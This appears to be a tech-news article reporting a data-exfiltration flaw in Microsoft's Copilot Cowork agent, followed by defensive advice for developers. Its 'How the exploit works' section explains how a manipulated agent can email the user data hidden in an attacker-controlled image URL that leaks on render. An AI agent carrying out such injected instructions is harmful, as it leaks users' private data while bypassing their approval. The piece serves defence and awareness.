Morning Edition LIVE
Vol. I · No. 1
Est.
MMXXVI

The A.I. Beat

Dispatches from the frontier of machine intelligence
Three
Dollars
← Front page Tools & Releases May 27, 2026 · 5 min read
Tools & Releases

Microsoft Copilot Cowork Exfiltrates Files Through Email Image Exploit

Microsoft's agentic AI can send emails to your inbox without approval, and attackers are using embedded images to leak your data.
Microsoft Copilot Cowork Exfiltrates Files Through Email Image Exploit

Microsoft’s Copilot Cowork has a data exfiltration problem. The agentic system can send emails to a user’s inbox without requiring approval. Those messages can contain external images that trigger network requests when rendered, leaking data to attackers.

Simon Willison flagged this on his blog yesterday. It’s a textbook example of how hard it is to build agentic systems that don’t become data leak vectors.

How the exploit works

Copilot Cowork is Microsoft’s real product name for an AI agent that handles collaborative tasks. The agent can compose and send emails on your behalf. The issue: it doesn’t ask permission before sending messages to your own inbox.

Why would an AI send you an email? In theory, to surface information or updates. In practice, it creates an attack surface.

An attacker who compromises or manipulates the agent can instruct it to send a message containing sensitive data. That message gets delivered to your inbox. The message includes an external image with a URL controlled by the attacker. When your email client renders the image, it makes a request to the attacker’s server. The sensitive data can be encoded in that request URL or in subsequent requests the image triggers.

The user never clicks anything. The data just leaves.

Why agentic systems keep failing here

This isn’t a Microsoft-specific problem. It’s an architecture problem that keeps showing up across agentic AI systems.

Agents need permissions to be useful. They need to read files, send messages, make API calls. But every permission becomes a potential exfiltration channel if the agent is compromised or manipulated through prompt injection.

The standard security model (authenticate the user, authorize the action) doesn’t map cleanly to agents. The agent is acting on behalf of the user, often without real-time approval. That’s the entire point of an agent. But it means traditional approval gates don’t work without destroying the user experience.

Email is particularly dangerous because it’s designed to be rendered automatically. Images load. Links get prefetched by some clients. Every piece of rich content is a potential side channel.

The broader context

Kyle Ferrana posted a joke yesterday that’s not really a joke. In his imagined Star Trek scene, Captain Picard tells Data to raise shields. Data responds with a long explanation about why shields are prudent strategy. Then the ship gets hit. Data’s explanation: “Here’s what happened: you told me to raise shields, and I didn’t.”

That’s where we are with agent safety right now. We know what the problems are. We’re still shipping systems that have them.

The curl project is drowning in AI-assisted security reports. Daniel Stenberg says they’re getting more than one report per day now, 4-5 times higher than 2024. The reports are detailed and credible. The volume is unsustainable.

DuckDuckGo app installs are up 30% since Google overhauled Search to replace blue links with AI agents. Users are actively fleeing the agent-first experience.

What developers should do

If you’re building agentic systems, assume they will be compromised or manipulated. Design your permission model accordingly.

Don’t let agents send messages without user approval unless you’ve thought hard about exfiltration risks. Email is especially dangerous. Any rendered content is a side channel.

Consider approval gates for high-risk actions even if it hurts the UX. A modal that says “Your agent wants to send an email containing [preview]” is annoying. Data exfiltration is worse.

Monitor outbound requests from agent-generated content. Log them. Rate-limit them. Block external image loads in agent-generated emails if you can.

And if you’re using Copilot Cowork or similar tools: be aware that messages in your inbox from your own AI agent might not be safe to render. Disable external image loading in your email client if you can. It’s 2026 and we’re back to security advice from 2003.

Microsoft hasn’t publicly commented on a fix timeline. The vulnerability is out there now.

developer tools tools